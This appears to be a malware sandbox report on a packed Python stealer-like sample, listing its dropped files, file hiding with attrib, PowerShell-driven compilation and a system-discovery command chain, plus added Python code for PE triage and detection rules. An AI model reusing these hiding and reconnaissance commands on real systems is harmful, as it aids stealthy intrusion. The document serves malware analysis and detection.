            Source: C:\Windows\System32\ARP.EXESection loaded: snmpapi.dll
            Source: C:\Windows\System32\ARP.EXESection loaded: iphlpapi.dll
            Source: C:\Windows\System32\ARP.EXESection loaded: inetmib1.dll
            Source: C:\Windows\System32\ARP.EXESection loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\ARP.EXESection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\ARP.EXESection loaded: dnsapi.dll
            Source: C:\Windows\System32\NETSTAT.EXESection loaded: iphlpapi.dll
            Source: C:\Windows\System32\NETSTAT.EXESection loaded: snmpapi.dll
            Source: C:\Windows\System32\NETSTAT.EXESection loaded: inetmib1.dll
            Source: C:\Windows\System32\NETSTAT.EXESection loaded: mswsock.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
            Source: C:\Windows\System32\tasklist.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\systeminfo.exe systeminfo
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: rename_me_before.exe | Static PE information: Image base 0x140000000 > 0x60000000
            Source: rename_me_before.exe | Static file information: File size 11803970 > 1048576
            Source: rename_me_before.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: rename_me_before.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: rename_me_before.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: rename_me_before.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: rename_me_before.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: rename_me_before.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: rename_me_before.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: rename_me_before.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.pdb source: powershell.exe, 00000045.00000002.1826414031.000001DBC0644000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_uuid.pdb source: rename_me_before.exe, 00000000.00000003.1661117895.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, _uuid.pyd.0.dr
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.pdbhP source: powershell.exe, 00000045.00000002.1826414031.000001DBC0644000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \ia.pdbc source: powershell.exe, 00000045.00000002.1848424397.000001DBD74B3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: rename_me_before.exe, 00000000.00000003.1659342426.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, VCRUNTIME140.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: rename_me_before.exe, 00000000.00000003.1659342426.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, VCRUNTIME140.dll.0.dr
            Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: rename_me_before.exe, 00000000.00000003.1664519798.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1981233285.000001B17FDC0000.00000002.00000001.01000000.00000006.sdmp
            Source: rename_me_before.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: rename_me_before.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: rename_me_before.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: rename_me_before.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: rename_me_before.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.cmdline"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.cmdline"
            Source: VCRUNTIME140.dll.0.dr | Static PE information: section name: _RDATA
            Source: libffi-8.dll.0.dr | Static PE information: section name: UPX2
            Source: _rust.pyd.0.dr | Static PE information: section name: UPX2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 69_2_00007FFD99D509A2 pushad ; ret 69_2_00007FFD99D50AE2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 69_2_00007FFD99D500BD pushad ; iretd 69_2_00007FFD99D500C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 69_2_00007FFD99D56329 push ecx; ret 69_2_00007FFD99D5632C
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 69_2_00007FFD99D50695 push edx; ret 69_2_00007FFD99D5065A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 69_2_00007FFD99D50A60 pushad ; ret 69_2_00007FFD99D50AE2
            Source: initial sample | Static PE information: section name: UPX0 (row repeated 29 times in the report)
            Source: initial sample | Static PE information: section name: UPX1 (row repeated 29 times in the report)
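The static PE rows above (the UPX0/UPX1/UPX2 section names on the dropped files, the DllCharacteristics flag list and the image-base comparison) can be reproduced offline with a small header parser. The code below is an added example written for this page, not code from Joe Sandbox or from the analysed sample; it reads only the DOS, COFF, optional and section headers. The packed and clean inputs it feeds itself are constructed header-only skeletons (no code, no real bytes from the dropped files), and the section sizes and offsets in them are made up to mimic a UPX layout.

```python
import struct

# IMAGE_OPTIONAL_HEADER.DllCharacteristics bits (winnt.h IMAGE_DLLCHARACTERISTICS_*).
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",
    0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT",
    0x0200: "NO_ISOLATION",
    0x0400: "NO_SEH",
    0x0800: "NO_BIND",
    0x1000: "APPCONTAINER",
    0x2000: "WDM_DRIVER",
    0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}

# Section names UPX leaves behind; the report lists UPX0/UPX1/UPX2 on the dropped DLL/PYD files.
UPX_SECTIONS = {"UPX0", "UPX1", "UPX2"}


def parse_pe(data: bytes) -> dict:
    """Minimal PE parser: image base, DllCharacteristics and the section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _machine, nsections, _, _, _, opt_size, _chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x20B:          # PE32+ (64-bit): 8-byte ImageBase at +24
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    elif magic == 0x10B:        # PE32: BaseOfData precedes a 4-byte ImageBase at +28
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]   # same offset in PE32 and PE32+
    sections = []
    table = opt + opt_size
    for i in range(nsections):
        off = table + 40 * i
        name = data[off:off + 8].rstrip(b"\x00").decode("latin-1")
        vsize, vaddr, rawsize, rawptr = struct.unpack_from("<IIII", data, off + 8)
        sections.append({"name": name, "vsize": vsize, "vaddr": vaddr,
                         "rawsize": rawsize, "rawptr": rawptr})
    return {"image_base": image_base, "dll_characteristics": dll_chars, "sections": sections}


def decode_dll_characteristics(value: int) -> list:
    return [name for bit, name in DLL_CHARACTERISTICS.items() if value & bit]


def triage(data: bytes) -> list:
    """Return the static findings a sandbox would print for this file."""
    pe = parse_pe(data)
    findings = []
    upx = [s["name"] for s in pe["sections"] if s["name"] in UPX_SECTIONS]
    if upx:
        findings.append("UPX section names: " + ", ".join(upx))
    for s in pe["sections"]:
        # A UPX0-style section has no bytes on disk but a large virtual size: it is the
        # region the stub unpacks into at run time.
        if s["rawsize"] == 0 and s["vsize"] >= 0x1000:
            findings.append(f"section {s['name']} has no raw data but {s['vsize']:#x} virtual bytes")
    if pe["image_base"] > 0x60000000:
        # 0x140000000 is the default MSVC PE32+ image base, so by itself this is ordinary;
        # the sandbox prints it as context rather than as an indicator.
        findings.append(f"image base {pe['image_base']:#x} > 0x60000000")
    flags = decode_dll_characteristics(pe["dll_characteristics"])
    missing = [f for f in ("DYNAMIC_BASE", "NX_COMPAT") if f not in flags]
    if missing:
        findings.append("mitigations missing: " + ", ".join(missing))
    return findings


def build_sample_pe(sections, dll_chars=0xC160, image_base=0x140000000) -> bytes:
    """Constructed PE32+ skeleton (headers only, no code) used as offline sample input.
    sections: list of (name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                   # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, 240, 0x22)
    opt = bytearray(240)                                       # PE32+ optional header incl. 16 data directories
    struct.pack_into("<H", opt, 0, 0x20B)
    struct.pack_into("<Q", opt, 24, image_base)
    struct.pack_into("<H", opt, 70, dll_chars)
    table = b"".join(
        name.encode().ljust(8, b"\x00")
        + struct.pack("<IIIIIIHHI", vsize, vaddr, rawsize, rawptr, 0, 0, 0, 0, 0x60000020)
        for name, vsize, vaddr, rawsize, rawptr in sections)
    return bytes(dos) + b"PE\x00\x00" + coff + bytes(opt) + table


if __name__ == "__main__":
    # Constructed layout mimicking a UPX-packed PYD: UPX0 is empty on disk, UPX1 holds packed data.
    packed = build_sample_pe([("UPX0", 0x40000, 0x1000, 0, 0x400),
                              ("UPX1", 0x1E000, 0x41000, 0x1D800, 0x400),
                              (".rsrc", 0x1000, 0x5F000, 0x1000, 0x1DC00)])
    for line in triage(packed):
        print(line)
    print(decode_dll_characteristics(parse_pe(packed)["dll_characteristics"]))
```

The DllCharacteristics value 0xC160 used for the constructed input decodes to exactly the five flags the report prints for rename_me_before.exe; the mitigation check is the inverse view, flagging a file that lacks ASLR or DEP support.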

            Persistence and Installation Behavior

            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
            Source: C:\Windows\System32\cmd.exe | Process created: attrib.exe
            Source: C:\Users\user\Desktop\rename_me_before.exe | Process created: attrib.exe
            Source: C:\Windows\System32\cmd.exe | Process created: attrib.exe
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
            Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI13962\libffi-8.dll
            Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI13962\frozenlist\_frozenlist.cp311-win_amd64.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI13962\_uuid.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI13962\_bz2.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp\_websocket.cp311-win_amd64.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI13962\_socket.pyd
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.dll
            Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI13962\_queue.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI13962\_overlapped.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI13962\VCRUNTIME140.dll
            Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI13962\pyexpat.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI13962\_cffi_backend.cp311-win_amd64.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp\_http_parser.cp311-win_amd64.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI13962\_lzma.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI13962\python3.dll
            Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI13962\unicodedata.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI13962\libcrypto-3.dll
            Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp\_helpers.cp311-win_amd64.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI13962\_hashlib.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI13962\python311.dll
            Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI13962\_multiprocessing.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI13962\multidict\_multidict.cp311-win_amd64.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI13962\cryptography\hazmat\bindings\_rust.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI13962\select.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI13962\_ssl.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp\_http_writer.cp311-win_amd64.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI13962\yarl\_quoting_c.cp311-win_amd64.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI13962\_decimal.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI13962\_sqlite3.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI13962\_asyncio.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI13962\libssl-3.dll
            Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI13962\sqlite3.dll
            Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI13962\_ctypes.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe | File created: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc query type= service state= all
            Source: C:\Users\user\Desktop\rename_me_before.exe | Code function: 0_2_00007FF6404E6EA0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00007FF6404E6EA0
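The process-creation rows in this section (attrib +h +s on a copy under AppData\Local, csc.exe launched by powershell.exe with a response file in Temp, and the systeminfo / tasklist / ipconfig /all / sc query chain run from cmd.exe) are what a Sysmon Event ID 1 or EDR feed would show, and each is a cheap detection on its own. The rule set below is an added example for this page, not part of the report or of any product. The event records it runs on are constructed to mirror the process tree the report prints; the pids, timestamps, the 60-second window and the four-distinct-tools threshold are assumptions, and the two trailing benign records exist only to show the rules staying quiet.

```python
import re
from collections import defaultdict

# Built-in discovery tools seen in this report's process tree and module-load rows.
DISCOVERY_TOOLS = {
    "systeminfo.exe", "tasklist.exe", "ipconfig.exe", "route.exe", "arp.exe", "netstat.exe",
    "netsh.exe", "sc.exe", "net.exe", "net1.exe", "quser.exe", "query.exe", "wmic.exe",
}
RULE_ATTRIB = "attrib +h +s on user-writable path"
RULE_CSC = "PowerShell-spawned csc.exe compiling from Temp"
# Paths under a user profile's AppData are writable without elevation.
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\appdata\\", re.I)
# csc.exe response file under a Temp directory, the pattern PowerShell Add-Type produces.
TEMP_CMDLINE = re.compile(r'@"?[^"\s]*\\temp\\[^"\s]*\.cmdline', re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events, window=60, min_tools=4):
    """Return sorted (timestamp, rule, detail) alerts for a list of process-creation events."""
    alerts = []
    discovery = defaultdict(list)            # parent pid -> [(ts, image)]
    for ev in events:
        image, cmd = basename(ev["image"]), ev["cmdline"]
        tokens = cmd.lower().split()
        if image == "attrib.exe" and "+h" in tokens and "+s" in tokens and USER_WRITABLE.search(cmd):
            alerts.append((ev["ts"], RULE_ATTRIB, cmd))
        if image == "csc.exe" and basename(ev["parent_image"]) == "powershell.exe" and TEMP_CMDLINE.search(cmd):
            alerts.append((ev["ts"], RULE_CSC, cmd))
        if image in DISCOVERY_TOOLS:
            discovery[ev["ppid"]].append((ev["ts"], image))
    for ppid, runs in discovery.items():
        runs.sort()
        for t0, _ in runs:                   # sliding window over one parent's children
            tools = {img for ts, img in runs if t0 <= ts <= t0 + window}
            if len(tools) >= min_tools:
                alerts.append((t0, f"discovery burst from parent pid {ppid}: " + ", ".join(sorted(tools)), ""))
                break                        # one alert per parent is enough
    return sorted(alerts)


CMD = "C:\\Windows\\System32\\cmd.exe"
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
CSC = "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe"
# Constructed events modelled on the report's process tree (pids and timestamps are invented).
SAMPLE_EVENTS = [
    {"ts": 1, "pid": 101, "ppid": 100, "parent_image": CMD, "image": "C:\\Windows\\System32\\attrib.exe",
     "cmdline": 'attrib +h +s "C:\\Users\\user\\AppData\\Local\\ExelaUpdateService\\Exela.exe"'},
    {"ts": 6, "pid": 103, "ppid": 102, "parent_image": CMD, "image": "C:\\Windows\\System32\\systeminfo.exe",
     "cmdline": "systeminfo"},
    {"ts": 7, "pid": 104, "ppid": 102, "parent_image": CMD, "image": "C:\\Windows\\System32\\tasklist.exe",
     "cmdline": "tasklist"},
    {"ts": 9, "pid": 105, "ppid": 102, "parent_image": CMD, "image": "C:\\Windows\\System32\\ipconfig.exe",
     "cmdline": "ipconfig /all"},
    {"ts": 11, "pid": 106, "ppid": 102, "parent_image": CMD, "image": "C:\\Windows\\System32\\sc.exe",
     "cmdline": "sc query type= service state= all"},
    {"ts": 30, "pid": 110, "ppid": 60, "parent_image": PS, "image": CSC,
     "cmdline": f'"{CSC}" /noconfig /fullpaths @"C:\\Users\\user\\AppData\\Local\\Temp\\iqddoona\\iqddoona.cmdline"'},
    # Benign controls: hiding a file outside any user profile, and a lone ipconfig.
    {"ts": 40, "pid": 120, "ppid": 70, "parent_image": CMD, "image": "C:\\Windows\\System32\\attrib.exe",
     "cmdline": "attrib +h +s C:\\Windows\\Temp\\cache.bin"},
    {"ts": 41, "pid": 121, "ppid": 70, "parent_image": CMD, "image": "C:\\Windows\\System32\\ipconfig.exe",
     "cmdline": "ipconfig /all"},
]


if __name__ == "__main__":
    for ts, rule, detail in detect(SAMPLE_EVENTS):
        print(f"t={ts:>3}  {rule}  {detail}")
```

The burst rule keys on the parent pid rather than on the command name because, as the rows above show, each discovery command is spawned by a cmd.exe child of the sample; grouping by parent is what separates a scripted chain from an administrator typing one ipconfig.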
            Source: C:\Windows\System32\tasklist.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\tasklist.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\tasklist.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (row repeated 39 times in the report)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
